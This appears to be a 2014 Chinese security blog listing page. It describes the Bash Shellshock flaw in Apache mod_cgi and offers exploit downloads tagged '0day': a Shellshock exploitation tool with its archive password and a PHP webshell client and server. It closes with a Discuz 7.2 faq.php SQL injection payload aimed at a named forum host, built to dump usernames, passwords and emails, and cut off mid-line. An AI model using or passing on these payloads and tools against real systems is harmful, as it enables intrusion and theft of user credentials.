『河马』apache mod_cgi bash 命令注入漏洞
作者:admin 日期:2014-10-25
『河马』apache mod_cgi bash 命令注入漏洞v2.0
作者:admin 日期:2014-10-28
2014年9月24日Bash被公布存在远程代码执行漏洞,河马安全网第一时间根据信息研判,确认该漏洞可以产生严重的后果,且分布广泛,于北京时间9月24日早晨5时30分启动了分析代码和工具利用编写。河马安全网针对该漏洞进行了严格地分析验证,确认该漏洞会影响目前主流的Linux和Mac OSX操作系统平台,包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平台。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与Bash交互的多种应用,包括HTTP、OpenSSH、DHCP等。根据目前的漏洞验证情况以及已经流传的POC情况,这个漏洞将严重影响网络基础设施的安全,包括但不限于网络设备、网络安全设备、云和大数据中心等。特别是Bash广泛地分布和存在于设备中,其消除过程将非常长尾,且易于利用其编写蠕虫进行自动化传播,同时也将导致僵尸网络的发展,目前已有多个境外安全机构发出了警告。
『河马』apache mod_cgi bash 命令注入漏洞利用工具v2.0(解压密码 isafe.cc).rar
Tags: 0day
河马web应用防火墙
作者:admin 日期:2014-10-20
【河马】php一句话木马服务端和客户端v1.3
作者:admin 日期:2014-10-08
【河马】discuz_7.2_faq.php_注入漏洞利用工具
作者:admin 日期:2014-10-07
discuz_7.2_faq.php_注入漏洞利用工具 POC
http://bbs.dianjian.net//faq.php?action=
grouppermission&gids[99]=%27&gids[100]
[0]=)%20and%20(select%201%20from%20
(select%20count(*),concat((select%20(select%20(select%20concat(username,0x23,password,0x23,email)%20f
Tags: 0day
- 1